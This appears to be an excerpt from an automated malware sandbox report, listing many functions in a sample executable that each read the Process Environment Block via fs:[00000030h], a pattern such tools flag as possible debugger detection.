    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E0F453 mov eax, dword ptr fs:[00000030h]5_2_36E0F453
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D51460 mov eax, dword ptr fs:[00000030h]5_2_36D51460
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D51460 mov eax, dword ptr fs:[00000030h]5_2_36D51460
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D51460 mov eax, dword ptr fs:[00000030h]5_2_36D51460
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D51460 mov eax, dword ptr fs:[00000030h]5_2_36D51460
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D51460 mov eax, dword ptr fs:[00000030h]5_2_36D51460
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D6F460 mov eax, dword ptr fs:[00000030h]5_2_36D6F460
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D6F460 mov eax, dword ptr fs:[00000030h]5_2_36D6F460
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D6F460 mov eax, dword ptr fs:[00000030h]5_2_36D6F460
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D6F460 mov eax, dword ptr fs:[00000030h]5_2_36D6F460
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D6F460 mov eax, dword ptr fs:[00000030h]5_2_36D6F460
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D6F460 mov eax, dword ptr fs:[00000030h]5_2_36D6F460
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DD7410 mov eax, dword ptr fs:[00000030h]5_2_36DD7410
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D7340D mov eax, dword ptr fs:[00000030h]5_2_36D7340D
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DCD5D0 mov eax, dword ptr fs:[00000030h]5_2_36DCD5D0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DCD5D0 mov ecx, dword ptr fs:[00000030h]5_2_36DCD5D0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D795DA mov eax, dword ptr fs:[00000030h]5_2_36D795DA
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D855C0 mov eax, dword ptr fs:[00000030h]5_2_36D855C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D715F4 mov eax, dword ptr fs:[00000030h]5_2_36D715F4
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D715F4 mov eax, dword ptr fs:[00000030h]5_2_36D715F4
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D715F4 mov eax, dword ptr fs:[00000030h]5_2_36D715F4
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D715F4 mov eax, dword ptr fs:[00000030h]5_2_36D715F4
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D715F4 mov eax, dword ptr fs:[00000030h]5_2_36D715F4
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D715F4 mov eax, dword ptr fs:[00000030h]5_2_36D715F4
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E255C9 mov eax, dword ptr fs:[00000030h]5_2_36E255C9
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E235D7 mov eax, dword ptr fs:[00000030h]5_2_36E235D7
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E235D7 mov eax, dword ptr fs:[00000030h]5_2_36E235D7
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E235D7 mov eax, dword ptr fs:[00000030h]5_2_36E235D7
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DDB594 mov eax, dword ptr fs:[00000030h]5_2_36DDB594
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DDB594 mov eax, dword ptr fs:[00000030h]5_2_36DDB594
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E235B6 mov eax, dword ptr fs:[00000030h]5_2_36E235B6
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4758F mov eax, dword ptr fs:[00000030h]5_2_36D4758F
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4758F mov eax, dword ptr fs:[00000030h]5_2_36D4758F
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4758F mov eax, dword ptr fs:[00000030h]5_2_36D4758F
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E0F5BE mov eax, dword ptr fs:[00000030h]5_2_36E0F5BE
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DE35BA mov eax, dword ptr fs:[00000030h]5_2_36DE35BA
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DE35BA mov eax, dword ptr fs:[00000030h]5_2_36DE35BA
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DE35BA mov eax, dword ptr fs:[00000030h]5_2_36DE35BA
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DE35BA mov eax, dword ptr fs:[00000030h]5_2_36DE35BA
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D7F5B0 mov eax, dword ptr fs:[00000030h]5_2_36D7F5B0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D7F5B0 mov eax, dword ptr fs:[00000030h]5_2_36D7F5B0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D7F5B0 mov eax, dword ptr fs:[00000030h]5_2_36D7F5B0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D7F5B0 mov eax, dword ptr fs:[00000030h]5_2_36D7F5B0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D7F5B0 mov eax, dword ptr fs:[00000030h]5_2_36D7F5B0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D7F5B0 mov eax, dword ptr fs:[00000030h]5_2_36D7F5B0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D7F5B0 mov eax, dword ptr fs:[00000030h]5_2_36D7F5B0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D7F5B0 mov eax, dword ptr fs:[00000030h]5_2_36D7F5B0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D7F5B0 mov eax, dword ptr fs:[00000030h]5_2_36D7F5B0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DED5B0 mov eax, dword ptr fs:[00000030h]5_2_36DED5B0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DED5B0 mov eax, dword ptr fs:[00000030h]5_2_36DED5B0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D715A9 mov eax, dword ptr fs:[00000030h]5_2_36D715A9
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D715A9 mov eax, dword ptr fs:[00000030h]5_2_36D715A9
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D715A9 mov eax, dword ptr fs:[00000030h]5_2_36D715A9
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D715A9 mov eax, dword ptr fs:[00000030h]5_2_36D715A9
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D715A9 mov eax, dword ptr fs:[00000030h]5_2_36D715A9
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DFB550 mov eax, dword ptr fs:[00000030h]5_2_36DFB550
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DFB550 mov eax, dword ptr fs:[00000030h]5_2_36DFB550
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DFB550 mov eax, dword ptr fs:[00000030h]5_2_36DFB550
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D8B570 mov eax, dword ptr fs:[00000030h]5_2_36D8B570
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D8B570 mov eax, dword ptr fs:[00000030h]5_2_36D8B570
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4B562 mov eax, dword ptr fs:[00000030h]5_2_36D4B562
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E0B52F mov eax, dword ptr fs:[00000030h]5_2_36E0B52F
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E25537 mov eax, dword ptr fs:[00000030h]5_2_36E25537
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D87505 mov eax, dword ptr fs:[00000030h]5_2_36D87505
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D87505 mov ecx, dword ptr fs:[00000030h]5_2_36D87505
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D5D534 mov eax, dword ptr fs:[00000030h]5_2_36D5D534
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D5D534 mov eax, dword ptr fs:[00000030h]5_2_36D5D534
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D5D534 mov eax, dword ptr fs:[00000030h]5_2_36D5D534
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D5D534 mov eax, dword ptr fs:[00000030h]5_2_36D5D534
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D5D534 mov eax, dword ptr fs:[00000030h]5_2_36D5D534
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D5D534 mov eax, dword ptr fs:[00000030h]5_2_36D5D534
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D8D530 mov eax, dword ptr fs:[00000030h]5_2_36D8D530
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D8D530 mov eax, dword ptr fs:[00000030h]5_2_36D8D530
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DFF525 mov eax, dword ptr fs:[00000030h]5_2_36DFF525
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DFF525 mov eax, dword ptr fs:[00000030h]5_2_36DFF525
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DFF525 mov eax, dword ptr fs:[00000030h]5_2_36DFF525
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DFF525 mov eax, dword ptr fs:[00000030h]5_2_36DFF525
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DFF525 mov eax, dword ptr fs:[00000030h]5_2_36DFF525
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DFF525 mov eax, dword ptr fs:[00000030h]5_2_36DFF525
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DFF525 mov eax, dword ptr fs:[00000030h]5_2_36DFF525
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E252E2 mov eax, dword ptr fs:[00000030h]5_2_36E252E2
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D7F2D0 mov eax, dword ptr fs:[00000030h]5_2_36D7F2D0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D7F2D0 mov eax, dword ptr fs:[00000030h]5_2_36D7F2D0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4B2D3 mov eax, dword ptr fs:[00000030h]5_2_36D4B2D3
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4B2D3 mov eax, dword ptr fs:[00000030h]5_2_36D4B2D3
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4B2D3 mov eax, dword ptr fs:[00000030h]5_2_36D4B2D3
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E012ED mov eax, dword ptr fs:[00000030h]5_2_36E012ED
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E012ED mov eax, dword ptr fs:[00000030h]5_2_36E012ED
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E012ED mov eax, dword ptr fs:[00000030h]5_2_36E012ED
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E012ED mov eax, dword ptr fs:[00000030h]5_2_36E012ED
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E012ED mov eax, dword ptr fs:[00000030h]5_2_36E012ED
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E012ED mov eax, dword ptr fs:[00000030h]5_2_36E012ED
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E012ED mov eax, dword ptr fs:[00000030h]5_2_36E012ED
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E012ED mov eax, dword ptr fs:[00000030h]5_2_36E012ED
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E012ED mov eax, dword ptr fs:[00000030h]5_2_36E012ED
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E012ED mov eax, dword ptr fs:[00000030h]5_2_36E012ED
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E012ED mov eax, dword ptr fs:[00000030h]5_2_36E012ED
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E012ED mov eax, dword ptr fs:[00000030h]5_2_36E012ED
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E012ED mov eax, dword ptr fs:[00000030h]5_2_36E012ED
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E012ED mov eax, dword ptr fs:[00000030h]5_2_36E012ED
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D592C5 mov eax, dword ptr fs:[00000030h]5_2_36D592C5
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D592C5 mov eax, dword ptr fs:[00000030h]5_2_36D592C5
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D7B2C0 mov eax, dword ptr fs:[00000030h]5_2_36D7B2C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D7B2C0 mov eax, dword ptr fs:[00000030h]5_2_36D7B2C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D7B2C0 mov eax, dword ptr fs:[00000030h]5_2_36D7B2C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D7B2C0 mov eax, dword ptr fs:[00000030h]5_2_36D7B2C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D7B2C0 mov eax, dword ptr fs:[00000030h]5_2_36D7B2C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D7B2C0 mov eax, dword ptr fs:[00000030h]5_2_36D7B2C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D7B2C0 mov eax, dword ptr fs:[00000030h]5_2_36D7B2C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E0F2F8 mov eax, dword ptr fs:[00000030h]5_2_36E0F2F8
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D492FF mov eax, dword ptr fs:[00000030h]5_2_36D492FF
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DFB2F0 mov eax, dword ptr fs:[00000030h]5_2_36DFB2F0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DFB2F0 mov eax, dword ptr fs:[00000030h]5_2_36DFB2F0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D8329E mov eax, dword ptr fs:[00000030h]5_2_36D8329E
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D8329E mov eax, dword ptr fs:[00000030h]5_2_36D8329E
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E192A6 mov eax, dword ptr fs:[00000030h]5_2_36E192A6
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E192A6 mov eax, dword ptr fs:[00000030h]5_2_36E192A6
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E192A6 mov eax, dword ptr fs:[00000030h]5_2_36E192A6
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E192A6 mov eax, dword ptr fs:[00000030h]5_2_36E192A6
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E25283 mov eax, dword ptr fs:[00000030h]5_2_36E25283
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DD92BC mov eax, dword ptr fs:[00000030h]5_2_36DD92BC
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DD92BC mov eax, dword ptr fs:[00000030h]5_2_36DD92BC
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DD92BC mov ecx, dword ptr fs:[00000030h]5_2_36DD92BC
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DD92BC mov ecx, dword ptr fs:[00000030h]5_2_36DD92BC
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D652A0 mov eax, dword ptr fs:[00000030h]5_2_36D652A0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D652A0 mov eax, dword ptr fs:[00000030h]5_2_36D652A0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D652A0 mov eax, dword ptr fs:[00000030h]5_2_36D652A0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D652A0 mov eax, dword ptr fs:[00000030h]5_2_36D652A0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DE72A0 mov eax, dword ptr fs:[00000030h]5_2_36DE72A0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DE72A0 mov eax, dword ptr fs:[00000030h]5_2_36DE72A0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E1D26B mov eax, dword ptr fs:[00000030h]5_2_36E1D26B
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E1D26B mov eax, dword ptr fs:[00000030h]5_2_36E1D26B
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D49240 mov eax, dword ptr fs:[00000030h]5_2_36D49240
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D49240 mov eax, dword ptr fs:[00000030h]5_2_36D49240
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D8724D mov eax, dword ptr fs:[00000030h]5_2_36D8724D
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D79274 mov eax, dword ptr fs:[00000030h]5_2_36D79274
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D91270 mov eax, dword ptr fs:[00000030h]5_2_36D91270
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D91270 mov eax, dword ptr fs:[00000030h]5_2_36D91270
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E0B256 mov eax, dword ptr fs:[00000030h]5_2_36E0B256
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E0B256 mov eax, dword ptr fs:[00000030h]5_2_36E0B256
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E25227 mov eax, dword ptr fs:[00000030h]5_2_36E25227
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D87208 mov eax, dword ptr fs:[00000030h]5_2_36D87208
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D87208 mov eax, dword ptr fs:[00000030h]5_2_36D87208
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E0F3E6 mov eax, dword ptr fs:[00000030h]5_2_36E0F3E6
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E253FC mov eax, dword ptr fs:[00000030h]5_2_36E253FC
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E0B3D0 mov ecx, dword ptr fs:[00000030h]5_2_36E0B3D0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DA739A mov eax, dword ptr fs:[00000030h]5_2_36DA739A
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DA739A mov eax, dword ptr fs:[00000030h]5_2_36DA739A
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DF13B9 mov eax, dword ptr fs:[00000030h]5_2_36DF13B9
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DF13B9 mov eax, dword ptr fs:[00000030h]5_2_36DF13B9
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DF13B9 mov eax, dword ptr fs:[00000030h]5_2_36DF13B9
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D733A5 mov eax, dword ptr fs:[00000030h]5_2_36D733A5
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D833A0 mov eax, dword ptr fs:[00000030h]5_2_36D833A0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D833A0 mov eax, dword ptr fs:[00000030h]5_2_36D833A0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E2539D mov eax, dword ptr fs:[00000030h]5_2_36E2539D
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D49353 mov eax, dword ptr fs:[00000030h]5_2_36D49353
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D49353 mov eax, dword ptr fs:[00000030h]5_2_36D49353
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E0F367 mov eax, dword ptr fs:[00000030h]5_2_36E0F367
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4D34C mov eax, dword ptr fs:[00000030h]5_2_36D4D34C
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4D34C mov eax, dword ptr fs:[00000030h]5_2_36D4D34C
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E25341 mov eax, dword ptr fs:[00000030h]5_2_36E25341
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D57370 mov eax, dword ptr fs:[00000030h]5_2_36D57370
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D57370 mov eax, dword ptr fs:[00000030h]5_2_36D57370
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D57370 mov eax, dword ptr fs:[00000030h]5_2_36D57370
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DF3370 mov eax, dword ptr fs:[00000030h]5_2_36DF3370
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E1132D mov eax, dword ptr fs:[00000030h]5_2_36E1132D
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E1132D mov eax, dword ptr fs:[00000030h]5_2_36E1132D
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DD930B mov eax, dword ptr fs:[00000030h]5_2_36DD930B
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DD930B mov eax, dword ptr fs:[00000030h]5_2_36DD930B
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DD930B mov eax, dword ptr fs:[00000030h]5_2_36DD930B
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D47330 mov eax, dword ptr fs:[00000030h]5_2_36D47330
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D7F32A mov eax, dword ptr fs:[00000030h]5_2_36D7F32A
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D790DB mov eax, dword ptr fs:[00000030h]5_2_36D790DB
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D670C0 mov eax, dword ptr fs:[00000030h]5_2_36D670C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D670C0 mov ecx, dword ptr fs:[00000030h]5_2_36D670C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D670C0 mov ecx, dword ptr fs:[00000030h]5_2_36D670C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D670C0 mov eax, dword ptr fs:[00000030h]5_2_36D670C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D670C0 mov ecx, dword ptr fs:[00000030h]5_2_36D670C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D670C0 mov ecx, dword ptr fs:[00000030h]5_2_36D670C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D670C0 mov eax, dword ptr fs:[00000030h]5_2_36D670C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D670C0 mov eax, dword ptr fs:[00000030h]5_2_36D670C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D670C0 mov eax, dword ptr fs:[00000030h]5_2_36D670C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D670C0 mov eax, dword ptr fs:[00000030h]5_2_36D670C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D670C0 mov eax, dword ptr fs:[00000030h]5_2_36D670C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D670C0 mov eax, dword ptr fs:[00000030h]5_2_36D670C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D670C0 mov eax, dword ptr fs:[00000030h]5_2_36D670C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D670C0 mov eax, dword ptr fs:[00000030h]5_2_36D670C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D670C0 mov eax, dword ptr fs:[00000030h]5_2_36D670C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D670C0 mov eax, dword ptr fs:[00000030h]5_2_36D670C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D670C0 mov eax, dword ptr fs:[00000030h]5_2_36D670C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D670C0 mov eax, dword ptr fs:[00000030h]5_2_36D670C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DCD0C0 mov eax, dword ptr fs:[00000030h]5_2_36DCD0C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DCD0C0 mov eax, dword ptr fs:[00000030h]5_2_36DCD0C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D750E4 mov eax, dword ptr fs:[00000030h]5_2_36D750E4
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D750E4 mov ecx, dword ptr fs:[00000030h]5_2_36D750E4
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E250D9 mov eax, dword ptr fs:[00000030h]5_2_36E250D9
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D55096 mov eax, dword ptr fs:[00000030h]5_2_36D55096
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D8909C mov eax, dword ptr fs:[00000030h]5_2_36D8909C
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D7D090 mov eax, dword ptr fs:[00000030h]5_2_36D7D090
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D7D090 mov eax, dword ptr fs:[00000030h]5_2_36D7D090
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4D08D mov eax, dword ptr fs:[00000030h]5_2_36D4D08D
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DDD080 mov eax, dword ptr fs:[00000030h]5_2_36DDD080
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DDD080 mov eax, dword ptr fs:[00000030h]5_2_36DDD080
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DF705E mov ebx, dword ptr fs:[00000030h]5_2_36DF705E
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DF705E mov eax, dword ptr fs:[00000030h]5_2_36DF705E
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E25060 mov eax, dword ptr fs:[00000030h]5_2_36E25060
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D7B052 mov eax, dword ptr fs:[00000030h]5_2_36D7B052
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D61070 mov eax, dword ptr fs:[00000030h]5_2_36D61070
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D61070 mov ecx, dword ptr fs:[00000030h]5_2_36D61070
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D61070 mov eax, dword ptr fs:[00000030h]5_2_36D61070
